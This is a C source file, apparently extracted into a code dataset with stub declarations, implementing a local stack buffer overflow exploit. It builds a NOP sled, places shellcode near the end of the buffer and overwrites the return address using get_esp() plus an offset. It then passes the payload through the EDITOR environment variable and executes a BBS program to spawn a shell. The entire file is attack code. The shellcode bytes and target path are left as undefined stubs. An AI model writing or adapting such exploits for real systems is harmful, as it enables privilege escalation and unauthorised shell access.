
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int buff ;


 char* BBS_PROGRAM ;
 scalar_t__ BUFFSIZE ;
 int OFFSET ;
 int * exec_shell ;
 int execl (char*,char*,int *) ;
 int exit (int) ;
 int get_esp () ;
 int memset (unsigned char*,int,int) ;
 int perror (char*) ;
 scalar_t__ setenv (char*,unsigned char*,int) ;
 int strlen (int *) ;
 int unsetenv (char*) ;

int main (void)
{
    unsigned char buff [518];
    unsigned char *ptr;
    int count;
    unsigned long *address_ptr;


    (void) memset (buff, 0x90, sizeof (buff));


    ptr = buff;
    ptr += BUFFSIZE - strlen (exec_shell);

    for (count = 0; count < strlen (exec_shell); count++)
        *ptr++ = exec_shell [count];


    address_ptr = (unsigned long *) &buff [509];

    for (count = 0; count < 2; count++)
        *address_ptr++ = get_esp () + OFFSET;


    ptr = (unsigned char *) address_ptr;
    *ptr = '\0';


    unsetenv ("EDITOR");

    if (setenv ("EDITOR", buff, 1)) {
        perror ("setenv");
        exit (1);
    }


    (void) execl (BBS_PROGRAM, BBS_PROGRAM, ((void*)0));
    perror (BBS_PROGRAM);
    exit (1);
}
